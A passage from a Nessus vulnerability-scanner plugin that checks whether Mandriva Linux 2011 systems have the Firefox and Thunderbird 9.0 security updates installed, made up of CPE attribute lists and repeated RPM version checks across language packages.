script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-kk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-kn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ku\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mai\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nso\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-or\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pa_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sv_SE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-te\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-th\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-en_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_AR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ga\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-lightning\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sv_SE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nsinstall\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-af-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ar-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ast-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-be-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-bg-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-bn-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-br-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-bs-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ca-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-cs-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-cy-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-da-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-de-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-devel-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-el-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-en_GB-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-eo-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-es_AR-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-es_ES-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-et-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-eu-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fa-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fi-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fy-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ga_IE-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-gd-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-gl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-gu_IN-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-he-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hi-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hu-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hy-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-id-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-is-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-it-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ja-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-kk-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-kn-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ko-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ku-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-lg-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-lt-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-lv-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-mai-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-mk-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ml-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-mr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nb_NO-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nn_NO-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-nso-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-or-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pa_IN-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pt_BR-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-pt_PT-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ro-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ru-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-si-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sk-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sq-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-sv_SE-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ta-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-te-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-th-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-tr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-uk-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-vi-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-zh_CN-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-zh_TW-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-zu-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ar-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ca-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-cs-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-da-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-de-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-en_GB-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ar-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ca-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-cs-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-de-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-el-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-es-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-fi-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-fr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-it-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ja-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ko-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-nb-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-nl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-pl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-pt-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-pt_BR-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-ru-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-sl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-sv-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-tr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-vi-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-zh_CN-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-enigmail-zh_TW-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-es_AR-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-es_ES-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-et-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-eu-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-fi-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-fr-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-fy-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-ga-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-gd-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-gl-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-he-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-hu-9.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"mozilla-thunderbird-is-9.0-0.1-mdv2011.0\", 